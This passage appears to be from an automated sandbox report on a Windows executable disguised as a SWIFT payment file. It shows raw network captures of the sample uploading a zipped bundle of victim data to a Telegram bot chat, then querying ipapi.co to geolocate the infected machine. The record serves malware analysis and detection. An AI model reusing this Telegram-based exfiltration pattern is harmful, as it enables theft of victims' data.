bd 8c 40 5c 50 95 52 f1 fa 86 d0 7e 77 e5 28 59 d3 6c aa fb 75 ad cc e5 37 4c fc dc 0b c9 19 73
                                                                                      Data Ascii: ^d:}2f,|kwd0+[%YrAw$=nlISNoiyf)vj?zyC?[S%Wo#sP=h>U=p`mIFU6J_ l=g=juvkazKVoD/ZP~7 _$-$%#*QYmU"@\PR~w(Ylu7Ls
                                                                                      2023-05-22 17:50:28 UTC514OUTData Raw: dc 00 63 34 5d 46 b6 61 d3 bb 17 e6 c7 57 0a c7 84 db 6e b0 ff 62 e6 14 4c c8 37 b1 79 72 b1 57 a0 04 71 b3 eb 71 94 7e e6 89 f6 a7 f8 a7 72 da 5b da 7a f4 df de fe c4 96 ce 2e 1d 02 a7 f8 f4 c3 2d d3 b8 93 36 6d 1d b6 fc 13 56 c5 60 04 96 f6 63 d0 07 58 48 e9 15 55 eb 45 f9 7a 70 60 e4 49 6b 3e 83 22 9c 4a 0e ad 44 7a 5a 87 08 65 5b 40 95 70 03 2d 35 a8 37 99 90 42 5c 82 be de dd 09 e0 8e 44 1c b2 ff bc 01 04 5c e2 5f 73 0e b3 8c 0a 60 8c cf 38 4a 42 a2 71 71 81 34 58 38 4c 17 38 ba 2e c2 32 e0 a4 c1 2d 90 00 a1 bd 20 53 2d 8f 0b 47 0f 41 d7 3f 26 20 64 63 8f b6 2e 87 fc c0 f4 df 15 63 f1 24 14 01 cf a4 08 86 c5 b8 20 6b 21 28 01 e5 50 40 06 85 c3 fc 4d 55 42 0d 4b f0 19 2c 41 b5 22 4b bd 2a 88 76 01 fd ea 0b 23 88 6e 88 aa ba 33 86 81 0c 03 59 0b 65 44
                                                                                      Data Ascii: c4]FaWnbL7yrWqq~r[z.-6mV`cXHUEzp`Ik>"JDzZe[@p-57B\D\_s`8JBqq4X8L8.2- S-GA?& dc.c$ k!(P@MUBK,A"K*v#n3YeD
                                                                                      2023-05-22 17:50:28 UTC530OUTData Raw: e0 ee 0f ee a0 12 3f ba 87 e7 fa b1 f5 1c d4 ca f7 7a f7 f7 34 b6 fb 7e bb fa ca 0f 9a 97 4f 39 10 7e d6 d9 ac e4 59 af 90 1f a6 94 8f c8 ec 9d 3c db f6 19 9d 04 df 7b 76 7f b1 75 a6 5a b8 ba cd f8 12 0f b4 ba 16 b4 cc 72 e1 07 8f f8 df 0d 87 84 d2 b9 ce c4 13 00 7b d7 7c 90 3e d2 2d f0 a4 ba 6e 86 6a 62 01 f6 7e 81 04 59 96 43 09 ef ca fd 19 4d 08 12 ec 90 e7 9c 82 1b 9b 0f eb e1 14 8e 08 a1 0c 86 4e e2 0f c3 b8 70 38 d8 13 24 0e 0a 39 0c cd 0d fd 9f b9 c1 25 1a 09 fc 23 fc 68 30 a0 e1 01 82 11 06 70 07 3f 09 82 c6 37 97 80 73 00 07 16 12 80 fe 93 de a3 83 e1 bd 0c 0e d2 00 ef 68 1c 87 e5 76 20 30 29 d2 98 82 48 9f fa 90 ac 28 98 d3 4d 87 10 a4 25 30 04 69 dc 71 e4 28 02 e4 1f 7a 0c 08 61 1a 0b 08 d2 78 84 36 ca 75 f3 fe fe 1a b3 8a 29 59 13 ad cb d1 0c
                                                                                      Data Ascii: ?z4~O9~Y<{vuZr{|>-njb~YCMNp8$9%#h0p?7shv 0)H(M%0iq(zax6u)Y
                                                                                      2023-05-22 17:50:28 UTC546OUTData Raw: de bf a9 4e 7c 2a ee ab b3 15 03 3f 96 90 04 1a 88 d8 c9 ab 10 07 ec 90 26 a9 35 16 de 57 97 c5 80 db 33 39 c1 01 a3 10 43 2d f8 28 da 12 41 87 08 7b 40 4a cd 2c ea 15 c5 91 2c 06 21 1f 86 c6 12 1f 45 2a fe b7 42 a0 c2 22 83 fb c8 f6 2c 28 83 56 f8 7f 03 60 35 e1 63 88 30 18 d7 18 5a 85 78 2d 11 a9 4c 1c ba 97 31 67 3e 0b 0a ec 00 15 d1 4c 8c 42 f3 d3 a4 59 7c 9d 10 e4 42 62 66 20 52 98 8e bb 42 2e 51 85 91 57 b4 eb 4b 02 38 7c 54 7f 4e 3a 5f b4 28 bc 53 ee be 35 c4 f6 aa 03 d1 d4 30 c7 a6 2c a0 5b d8 0b 67 8b 6a 19 69 91 bc 8d 99 f5 33 31 2c 63 a2 1a 73 25 e1 13 ec e1 f8 2f 87 c5 05 75 e9 ce 66 52 43 0a eb b9 66 94 89 ba 95 9e 3d de 70 a7 b2 2b 60 ef 91 7b 2b aa ec 28 a9 88 99 f7 5b 83 ec c6 48 09 49 e3 2e c4 e7 6d a3 79 5a d4 8c 48 80 a1 9e f3 36 7c 1d
                                                                                      Data Ascii: N|*?&5W39C-(A{@J,,!E*B",(V`5c0Zx-L1g>LBY|Bbf RB.QWK8|TN:_(S50,[gji31,cs%/ufRCf=p+`{+([HI.myZH6|
                                                                                      2023-05-22 17:50:28 UTC562OUTData Raw: 64 1e a8 cb 44 d7 24 b0 e8 da dd 70 00 05 54 e8 31 8d 66 c2 b3 49 a4 ae f2 ff ca 36 21 df 19 4b e8 81 2c 7d 61 56 fb 71 02 3e ca 46 19 d1 ef af 22 ce 1b 16 1d 96 77 f3 97 b1 18 09 47 e6 46 cc 9b c3 a9 e8 4f 8f 41 c1 5c 5f d3 98 e6 60 1a d4 37 e8 f3 e7 e2 98 fa c0 d0 32 51 72 79 59 44 ce c3 26 45 45 e3 6e 51 12 0b fc 55 27 4a 1c 8c d5 e8 27 80 1c fa 38 f8 4a f9 ca c4 dc e1 69 02 7c 51 70 0c 4e b7 28 80 11 2b 46 0f a0 80 b0 f0 b2 94 28 e3 6e 90 dc 05 41 ca 86 11 33 c1 04 ca f4 7e 8d c0 21 ba 68 82 fb 75 ac 24 13 a0 e2 0c e2 78 ac 93 58 42 70 11 04 f8 b8 dc a5 90 68 79 86 00 9c 20 ae 22 8d dc 41 90 09 9d 92 08 46 20 19 12 8f 9e 6b 79 49 9a 7f 99 18 02 a0 97 d4 6b 84 77 69 44 97 24 81 a0 69 eb 9a 58 ee 00 12 24 1c dd 7f 93 13 32 61 ca 23 5a 75 ed 79 49 46 1c
                                                                                      Data Ascii: dD$pT1fI6!K,}aVq>F"wGFOA\_`72QryYD&EEnQU'J'8Ji|QpN(+F(nA3~!hu$xXBphy "AF kyIkwiD$iX$2a#ZuyIF
                                                                                      2023-05-22 17:50:28 UTC578OUTData Raw: c5 aa 90 82 e4 2a 49 a5 bf 6f 61 71 d9 41 36 60 d5 ca a2 d1 d3 13 f2 2c de f2 b0 3e 0c 27 99 ad f9 96 bd 1e 49 a4 8a ed 97 06 68 35 16 40 30 ad a2 6b 65 f3 1b b0 db 61 f7 6c 42 6a ef 7a 12 bf fa ff d7 54 5f 97 1e 75 c6 ac 19 13 db 37 0a fc 82 84 13 93 31 6f 77 09 b7 1f c6 15 36 82 dc 42 ca 0a 53 d2 0b da 2b be f7 87 af 05 5c d8 5e 8d be 61 8b dc f6 5b e1 ff f3 4b f8 c2 05 a2 46 22 02 7e 83 f9 5b 0d 86 f4 91 fc d9 59 11 7f a3 3f e9 1c b7 47 2a 28 b2 e2 c2 c0 ea 05 ef 92 c4 1f 8a ee 1b bd 7c 1f 9f f9 7e 52 20 bb cb 5d 37 16 0c ae 16 4e 36 3a 27 62 34 39 10 d9 64 f7 f4 87 a6 ff 58 bd 47 c5 03 fc 1e ef aa 78 1b ee 53 b8 e4 a8 cf 6a 7b c2 8b b2 81 d7 c6 91 da db b7 9e a7 59 b3 57 32 3d dd 39 03 02 75 cd e5 85 cc 59 f8 58 bf dc 97 20 2f 35 dc fb 30 b5 7c 02 2d
                                                                                      Data Ascii: *IoaqA6`,>'Ih5@0kealBjzT_u71ow6BS+\^a[KF"~[Y?G*(|~R ]7N6:'b49dXGxSj{YW2=9uYX /50|-
                                                                                      2023-05-22 17:50:28 UTC594OUTData Raw: 66 03 11 1d 6d 44 2c 2a ea e6 cc ef 9d 84 f1 ce 33 c0 b6 cd 3d 3c d2 ed b6 7d db c2 5a b8 60 77 b0 a0 c4 69 5d 43 9c 84 e3 01 6b 68 6e 10 27 0d 1e c0 48 65 6f b4 02 00 8c a4 0e 42 36 76 02 5a 4f c1 59 52 cf a6 14 44 c3 33 c9 83 14 48 19 0b d0 a4 f0 a2 09 e9 f9 24 b0 15 0c e1 81 b8 37 fa 24 58 db 72 1e ff d7 1a 42 a6 5e 01 f4 3a 00 14 c8 bd 06 2d 81 07 a1 23 18 81 12 72 4c e4 e0 a6 38 1d 17 d9 01 ea 5d 24 56 94 a4 90 64 a0 eb 41 41 69 47 4a 72 28 75 0f 80 88 2f 46 97 cc ba 85 03 7a 9b 96 40 88 21 7c ad c3 48 90 56 fb 85 01 73 52 44 4b 28 f6 00 4f af 26 39 43 10 6c 61 41 78 16 05 e9 12 88 88 04 49 30 0c b4 eb 20 7e 47 72 81 ae 89 88 71 f0 3e ca a3 8a de fe c9 8a bc 0e ca 78 c0 42 87 06 88 46 a9 75 58 6e 11 41 fc 0c dd 4d 87 19 fa 4b 00 2c c3 a0 d0 25 0d 09
                                                                                      Data Ascii: fmD,*3=<}Z`wi]Ckhn'HeoB6vZOYRD3H$7$XrB^:-#rL8]$VdAAiGJr(u/Fz@!|HVsRDK(O&9ClaAxI0 ~Grq>xBFuXnAMK,%
                                                                                      2023-05-22 17:50:28 UTC610OUTData Raw: 97 72 fe eb 6c 8c 4a 92 e6 b4 6f 8b 03 9d 70 96 55 cb 9f 43 fd d9 5b bb 27 56 8a 71 77 bd 15 37 9c f7 d4 3c ae d5 cd dc 8e 57 c6 86 7e 3d bc de bb 5a 7a 6c c8 d7 10 65 d3 bd fd db e2 d5 53 54 df 32 e9 77 2c 13 f9 65 d7 e1 67 66 ba ce c7 c4 ee e5 16 0b 8f ae 56 ed c5 bc 97 a2 02 af 32 bb f6 a3 dc 3e 96 9d 53 5a 98 65 ef 01 9f 38 ff 39 de f7 a1 7f b2 75 a6 71 5f 40 98 af 06 6f d0 5d 3e 3b d0 7d f9 cd cf bd 88 80 fa 3f 41 65 fb 21 f2 c2 54 80 ae e4 c4 93 8d f1 6d 63 d5 13 bb 1c f8 f1 6d 48 f6 94 31 15 38 24 fb 88 0a e8 95 68 53 01 fa 84 3d b7 a4 e4 62 f7 dc 6d 3e b3 f7 b5 41 e5 86 8e 5c 0c c5 a2 a1 6c 67 3a f0 f8 80 92 d2 b2 02 fd 60 b7 9d 30 44 d7 19 cb 2d 96 11 eb 5b 85 82 05 3b 97 ca dc c7 f7 e9 d0 45 b0 8b de f2 43 9b 55 7b 7c 92 15 f2 81 c3 8b 11 81 47
                                                                                      Data Ascii: rlJopUC['Vqw7<W~=ZzleST2w,egfV2>SZe89uq_@o]>;}?Ae!TmcmH18$hS=bm>A\lg:`0D-[;ECU{|G
                                                                                      2023-05-22 17:50:28 UTC626OUTData Raw: 86 6b 6c 45 33 2d d1 4b 3e 5f 9e db a7 5b 8e 2c 1e 37 3a 46 3f 63 0b 34 d3 dc 63 d8 8c 77 ae 68 12 53 7c 87 af fe f0 99 e2 f3 1f cd f3 8b f2 f8 0f 16 39 e2 96 16 d1 72 57 15 72 f7 b5 9f d6 fd fd 7c de d7 20 cd fb 41 25 c8 7a d2 ad 45 61 ad f9 fb 44 a6 e4 43 6f 9d af fb 8a 08 2c 5a 60 54 fa 7f 02 a2 06 c4 97 1c d2 46 1d 28 d1 b5 66 12 97 bc 0b 58 5d e2 6a 27 f1 a4 38 01 47 91 14 b7 6f 29 28 2f 29 7c 12 97 c2 52 56 ed 04 69 9d cf e6 b5 99 9d 90 40 ac da ae a8 c7 2b 7c 44 2e 2d 4c 1a 20 3d 8c 06 7a 57 d4 5b 65 f4 8d 80 cd 4b 2e 65 46 e4 42 8a 36 ee 5c 53 fd 1e 33 f1 d5 ca 73 d4 46 14 39 2d 71 29 c7 c9 73 37 d3 20 f6 ba 4e 74 fb fe 36 e3 c3 f6 85 f4 f5 15 f2 d0 2f 1f 19 f1 27 e4 1b c2 85 1a 7d b0 71 8c 4d 6d 46 10 b5 c5 5d 61 85 0d f5 a6 83 82 e9 cf 07 b4 48
                                                                                      Data Ascii: klE3-K>_[,7:F?c4cwhS|9rWr| A%zEaDCo,Z`TF(fX]j'8Go)(/)|RVi@+|D.-L =zW[eK.eFB6\S3sF9-q)s7 Nt6/'}qMmF]aH
                                                                                      2023-05-22 17:50:28 UTC642OUTData Raw: 39 59 3f a3 b1 77 fd d2 bc 99 54 f6 0c d8 6c d3 8f 3d 3d 05 85 5a 25 8d 41 5f 0b 65 ed b3 aa 04 96 06 92 1f c8 5c 36 41 a1 bc 21 cb 93 f9 7d d5 c6 39 4a a8 55 88 37 c4 8f 3d 2d 89 8a 23 75 4a ad 21 da bf fb 43 cb 56 21 6c 90 5a 8d cb ba 08 25 1f 32 1b 8f 2d 4f 16 2d 32 a2 db c0 c1 2d 4f 12 b2 12 ed 66 02 f3 10 13 25 6d b0 d5 68 dd b2 90 b9 40 e2 e1 f6 5d 34 1f bb ea 51 1b ed a6 15 87 79 98 88 55 49 c4 3e d4 6b 38 97 b4 55 b6 ca bf a8 7b 73 11 f3 40 43 d1 bd ec 9e 70 a3 f7 f1 67 c5 3f 00 e5 dc dd 31 94 76 7a 11 d1 57 dd d5 6f 9c bc 68 60 58 a3 51 6c e7 cf 57 16 79 d5 5d f6 2a 2e fa 89 80 17 3f c4 2d bd 8f 89 58 94 a3 87 03 01 18 fc 3d ee 47 a5 a9 19 d3 a2 61 b0 9e 7b 8f 3b 93 99 50 39 c4 52 0c 21 0f 15 ec 33 97 0e 87 85 ce 33 95 c2 c1 1d 9d 72 70 61 dc c0
                                                                                      Data Ascii: 9Y?wTl==Z%A_e\6A!}9JU7=-#uJ!CV!lZ%2-O-2-Of%mh@]4QyUI>k8U{s@Cpg?1vzWoh`XQlWy]*.?-X=Ga{;P9R!33rpa
                                                                                      2023-05-22 17:50:28 UTC658OUTData Raw: 07 e6 9a 70 39 41 3a 51 96 9f 1b b7 8e 0c 6b 92 a7 e2 82 f4 be e7 ff a4 13 9b bd f2 87 cf 36 e1 e3 56 ba f0 b7 5f 06 3b 9a c1 25 f6 11 e3 f3 5b a5 fb 06 71 bb 49 32 09 9f fb a9 33 c8 5f 88 49 7b 07 dc 8f d6 12 f9 ad 12 cd f8 8a 05 52 79 e9 c6 70 50 f5 6f da 4c d8 4f de 7a f8 5a 43 6d 30 f1 fc be 1d d7 0c f2 ef 0c c2 f9 a1 e8 4e 01 3d e7 b7 3c 6f f1 89 ff b2 61 d4 8a 85 90 f2 54 c6 2a 28 a8 fa ad ea 56 d9 c5 f8 35 d3 fe f0 4e 9a 72 70 39 ee f7 de 98 5f 2a 4e 6f d3 c3 a3 5c dc d1 b3 cc 75 2c 57 42 f1 ba a2 dc 52 d0 95 2f a5 37 ce 73 f9 e3 0c 53 71 75 6d 85 6d a9 f7 53 a0 26 6d b9 16 17 09 61 ef 5c ba 6f 39 1a ed 48 a5 85 27 62 ba 3d 79 97 8f 41 57 ce 4c 91 c9 f7 16 12 69 2a f0 5f d8 57 8a 86 8d 7e 14 e3 67 19 4b 99 eb 95 37 95 f7 26 98 f7 08 73 f5 0a 66 6d
                                                                                      Data Ascii: p9A:Qk6V_;%[qI23_I{RypPoLOzZCm0N=<oaT*(V5Nrp9_*No\u,WBR/7sSqummS&ma\o9H'b=yAWLi*_W~gK7&sfm
                                                                                      2023-05-22 17:50:28 UTC674OUTData Raw: ff b8 7b 30 ce 5f 91 4c c3 72 cb d7 d3 f5 50 5c 89 a2 a7 6e ef 0a 52 ed fa 61 a6 90 65 c2 fc 83 6a f2 46 e0 87 87 d4 54 b7 26 7e 53 34 fc 8e 8d 2f 8e 70 b9 ed c5 ae 76 08 d4 ad 2c eb ed ed 99 1c 02 63 c2 87 00 4b 7e f6 1e 7a d9 6d 24 c1 c3 8e b5 7e cc 2b cd b3 ab a4 b0 96 4b f5 fc de fc f4 96 9d e0 7b 8e 64 6b 81 cc 38 38 4c ba ed e2 a3 38 31 1e a0 90 95 ca 73 3a df 46 92 bb 00 cf e9 90 33 ab d7 c3 2f 78 d3 ce cd 7e 85 ba d1 c8 9e 02 b1 1f e3 13 22 8d 81 dd 1d 7c 75 e1 4e f1 87 e7 07 f3 1a 55 4f bf f9 7a e9 9d 1d ac 68 e4 56 56 ee b9 42 7d 25 99 ef 65 be bd 25 94 1b 39 8b e1 85 cf 09 a3 d1 20 18 01 f9 15 2e 49 fe 69 10 48 7a a0 14 e1 2d c5 15 12 87 0d 02 69 2e 3c b5 43 9e 12 68 47 f3 92 98 83 54 00 01 54 91 d0 00 50 ea 4f c2 cb 29 61 5a f0 d3 d0 52 5c 2c
                                                                                      Data Ascii: {0_LrP\nRaejFT&~S4/pv,cK~zm$~+K{dk88L81s:F3/x~"|uNUOzhVVB}%e%9 .IiHz-i.<ChGTTPO)aZR\,
                                                                                      2023-05-22 17:50:28 UTC690OUTData Raw: db 61 33 ac 25 8e 17 a6 d2 36 15 7a d5 bf 1c bb 33 3c fa 44 24 b6 a6 25 60 4e 7c a2 33 5b ec b9 6a cb aa 25 ca cf 99 87 f5 a9 79 a2 68 d3 b7 c3 1b b3 d2 59 49 e2 e1 bf 92 56 3a 8b 5f cc 27 a3 24 fb 6c ff 08 95 a6 86 54 76 f3 c4 41 e4 4e 1d e6 66 17 0b aa e9 f0 e3 e2 90 0b e8 b3 36 1c 7f d9 9f 25 b9 76 d5 d9 ff ee c6 5e f8 5d c4 24 87 c0 00 ae 22 c2 3c 79 79 66 18 f9 10 a7 2f 72 55 3a aa a1 73 ed c2 f2 88 48 42 1c 89 5e 5e 5d ad 47 4d c3 a0 77 89 b4 e8 d1 b2 15 7b 79 b4 ed a8 e1 62 e5 b9 0f 6c 7f 0c 82 62 b0 cd 3f f3 c7 2d be fb 16 91 f0 50 04 b4 6d bc 7e 27 7d 77 43 5d 20 e0 fb e8 fb 14 9f 1b 2f 1d 13 78 4c 82 9f 04 db df 52 19 17 2a 75 41 6b bd bd bc c5 b2 ae 16 18 e4 62 9f 31 c2 b5 a5 53 54 fa 92 ed cf 9f ae 13 a7 53 7e 1f 91 f7 fd c2 3f 97 af 5a b1 2c
                                                                                      Data Ascii: a3%6z3<D$%`N|3[j%yhYIV:_'$lTvANf6%v^]$"<yyf/rU:sHB^^]GMw{yblb?-Pm~'}wC] /xLR*uAkb1STS~?Z,
                                                                                      2023-05-22 17:50:28 UTC706OUTData Raw: cd ba 6e f8 db 86 c6 53 09 95 c3 df bd 5d e2 68 ec 49 cb 8f b6 c8 56 6b 94 95 da 25 a0 e0 e1 e9 25 60 64 52 73 fc 65 62 85 d1 d6 2f 55 9f 50 17 16 31 f9 d9 7d 81 dc c6 9e ca 5b 7a c8 ae 57 25 df 0e 45 98 74 8c c0 1e 7d 8f ec 38 e0 cd 41 c7 4e 9a a7 2d 46 b1 f4 37 cf f5 2d ea eb 08 51 95 bf 9f 78 f7 60 94 9b 3f 14 e6 9a 2e e7 3f 48 7d 25 57 f6 89 d0 24 5d 95 80 ba 25 c6 69 0b 5c 76 f9 fd 8b 8d df 8a 42 5b 22 88 a1 f3 17 8a 5b 27 6d ee a7 66 13 5d 74 3c 28 ec b9 12 a8 c7 69 ff cc c3 52 ac 42 68 bc f9 47 e3 46 37 b5 ce 6c 4b 9d be e6 c8 86 7e e8 2b e3 a0 55 eb 4b 40 6f 4f 6b 17 11 d7 33 d6 16 f0 88 6d 60 cc 6a c3 91 6a a0 0b 7f a5 21 15 4e 1b fd aa ca f4 0b fa e1 93 92 d6 63 95 4b c0 a6 71 7c 07 b8 e5 12 70 cd e1 ce 79 d9 b6 f5 f3 95 e6 f3 82 fe e9 d5 d5 47
                                                                                      Data Ascii: nS]hIVk%%`dRseb/UP1}[zW%Et}8AN-F7-Qx`?.?H}%W$]%i\vB["['mf]t<(iRBhGF7lK~+UK@oOk3m`jj!NcKq|pyG
                                                                                      2023-05-22 17:50:28 UTC722OUTData Raw: ce a8 f1 bd 22 60 4f 1a 8d a4 ad e7 51 e0 24 70 77 ee b5 94 4c 41 80 63 5b 5d ee 64 7e 4b 9e 2c 1c 6b dc 79 a8 fd b5 d5 c1 bf 0e ba 5b 91 78 f9 db 02 1d 44 69 2a 5e 3b 6d 5b 3c d9 52 aa 89 71 af d5 a7 c2 e1 35 12 96 c3 0a 61 5d 65 3f 95 3b 3f 51 0e 20 e1 3e ea 05 9e 77 1f a9 ad f9 d2 41 59 b2 6d 3b 6b da bb 95 3f 76 61 74 d0 85 93 da 8b 43 ce f3 ce 26 d7 92 33 46 5d f4 8c 37 79 66 26 7d d3 61 43 56 53 de 39 f8 19 7f 74 31 bf 7e 76 a1 74 62 cc 98 c2 55 b8 31 7e 75 12 bf 66 6d 8b fe a7 10 db 18 af 65 7f b0 2c 65 e7 e5 f2 69 8f bd 98 3d 05 34 e7 37 40 d8 ff 35 da f5 e6 b8 e4 fe a9 ba f5 ea ee 87 1d 2f b5 44 29 f2 0f 42 be 48 25 9c 8f 66 fa 2e cf 72 ea 92 44 f9 d5 61 4a 4a 1d 61 c6 f6 6f f3 f7 7b f1 32 b8 90 42 21 94 e3 ce 47 3a 88 e9 7a a0 c0 aa 45 c2 d7 95
                                                                                      Data Ascii: "`OQ$pwLAc[]d~K,ky[xDi*^;m[<Rq5a]e?;?Q >wAYm;k?vatC&3F]7yf&}aCVS9t1~vtbU1~ufme,ei=47@5/D)BH%f.rDaJJao{2B!G:zE
                                                                                      2023-05-22 17:50:28 UTC738OUTData Raw: a8 98 88 be f9 b2 ef 27 b8 e3 67 5d be 56 0b c0 af 2e f4 72 31 77 c0 4c 26 70 90 16 56 ba cc b8 c1 df 64 0a 7b 07 dc 90 89 f0 e5 d8 c4 47 99 e9 c8 b3 d3 4b a0 e0 d3 a3 74 d8 e0 02 e5 25 8c 58 53 14 28 40 82 a9 46 e0 27 7d 67 1e 9f 9d cb 66 14 6a 7a 7b f3 14 2a 10 dd 60 27 c2 89 c7 41 d0 93 ba 66 70 28 bd 35 45 14 25 37 0e 49 af 9c 81 06 40 ce 9a 11 01 3c 49 2c 91 31 15 89 f5 d0 a3 8c 98 32 c3 44 74 48 51 c6 cc 6a 35 5c 6f c1 4b d2 b0 f7 ac 28 1d c8 e7 32 e1 3e f4 8c 4b aa 4d 67 95 41 93 34 b1 84 d5 97 7f 34 cd 97 31 93 55 de 92 31 0f fa 04 d2 89 c0 5a 5f 8e 6f 89 f1 b3 e8 c3 58 34 30 93 9c 1d 53 bc d4 ef 9a 34 e5 80 ff ea e7 26 78 43 06 5a 49 cc 0b 44 db ed 32 bc 59 ea 90 5c 81 18 69 45 c3 26 26 bc ac c6 20 4e 24 ea 3a 5f 56 48 89 1c bb 39 cb c9 41 19 e3
                                                                                      Data Ascii: 'g]V.r1wL&pVd{GKt%XS(@F'}gfjz{*`'Afp(5E%7I@<I,12DtHQj5\oK(2>KMgA441U1Z_oX40S4&xCZID2Y\iE&& N$:_VH9A
                                                                                      2023-05-22 17:50:28 UTC754OUTData Raw: a9 fe 04 5f 8a 74 fd 3e 78 84 fe 47 02 56 53 80 ba c5 e5 b1 60 86 88 02 53 ba eb 63 37 c7 72 d6 6b ed f3 3b a2 43 6d 3f f3 4d e6 64 14 ae de 54 58 af dc e2 a2 b1 42 c8 9a 5d 75 a4 8f 79 5e f7 7a 35 e4 18 ec 52 58 50 84 14 3c ab e4 d2 2b 15 1b 56 1e f7 de 94 89 fd 27 7e 8d 8b 8c 4b 3b 07 35 df 3f 54 e7 78 e1 33 f2 c3 6e 6f a9 b3 a5 8d cb 9d f2 74 9f 7d 7d 76 93 68 45 48 18 b4 7e 3e 69 f4 8d 89 a7 a8 5c 8a be 5b 73 b9 27 63 33 b5 d0 b3 b8 c1 d6 85 e9 ed 8e 58 57 45 c6 0b 99 b3 76 df cf 50 0f 0a 5d 98 e8 11 36 d1 23 78 6b 7f f0 be 27 82 1f b4 df 3f 04 d8 57 c5 ee 32 6d 6c 81 ad 69 6f 8d aa 33 9e 41 9f 3f 5d 68 77 10 9c 28 7b 9d 9f f1 09 33 6d d9 30 1c 2f b2 dd cf d3 23 62 38 cf cc 3a 6f 23 74 36 c8 96 ae 8c b5 66 07 61 c2 96 60 5e ea b0 fd c7 70 43 e1 3c 88
                                                                                      Data Ascii: _t>xGVS`Sc7rk;Cm?MdTXB]uy^z5RXP<+V'~K;5?Tx3not}}vhEH~>i\[s'c3XWEvP]6#xk'?W2mlio3A?]hw({3m0/#b8:o#t6fa`^pC<
                                                                                      2023-05-22 17:50:28 UTC763OUTData Raw: 0d 0a 2d 2d 30 63 35 35 32 61 66 66 2d 39 37 61 31 2d 34 31 36 63 2d 39 32 63 35 2d 65 38 36 35 32 34 66 61 32 62 65 35 2d 2d 0d 0a
                                                                                      Data Ascii: --0c552aff-97a1-416c-92c5-e86524fa2be5--
                                                                                      2023-05-22 17:50:28 UTC763INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 22 May 2023 17:50:28 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 516
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":723,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777828,"document":{"file_name":"C_UsersuserAppDataLocalTemp22_05_02023_20_48_14=user@12875.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAIC02Rrq2Qk0DT3wE25fVtSdxEsoc_-AAIBEAAClttYU9vIT8UPeCrkLwQ","file_unique_id":"AgADARAAApbbWFM","file_size":778434}}}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.549725172.67.69.226443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      2023-05-22 17:50:46 UTC764OUTGET /84.17.52.45/json HTTP/1.1
                                                                                      User-Agent: ipapi.co /#c-sharp-v1.03
                                                                                      Host: ipapi.co
                                                                                      Connection: Keep-Alive
                                                                                      2023-05-22 17:50:46 UTC764INHTTP/1.1 200 OK
                                                                                      Date: Mon, 22 May 2023 17:50:46 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 751
                                                                                      Connection: close
                                                                                      Allow: HEAD, OPTIONS, OPTIONS, POST, GET
                                                                                      X-Frame-Options: DENY
                                                                                      Vary: Host, Origin
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Referrer-Policy: same-origin
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FGdeuK1NqwR4cXZ%2FN3sz6NT%2B28z8HxLBGev2KALfrfa0Z5kEJZk%2FwlbG8guMK0dl%2BNFo2tX75w%2BexbSe1NvGNQzsO8EmmF535qIT9hjnQlz9OThBCdPcBU%2Fx"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 7cb6e742fcbb9106-FRA
                                                                                      2023-05-22 17:50:46 UTC765INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 30 2f 32 33 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 5a 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 5f 69 73
                                                                                      Data Ascii: { "ip": "84.17.52.45", "network": "84.17.52.0/23", "version": "IPv4", "city": "Zurich", "region": "Zurich", "region_code": "ZH", "country": "CH", "country_name": "Switzerland", "country_code": "CH", "country_code_is
                                                                                      2023-05-22 17:50:46 UTC766INData Raw: 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
                                                                                      Data Ascii: "asn": "AS212238", "org": "Datacamp Limited"}


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.549726149.154.167.220443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData
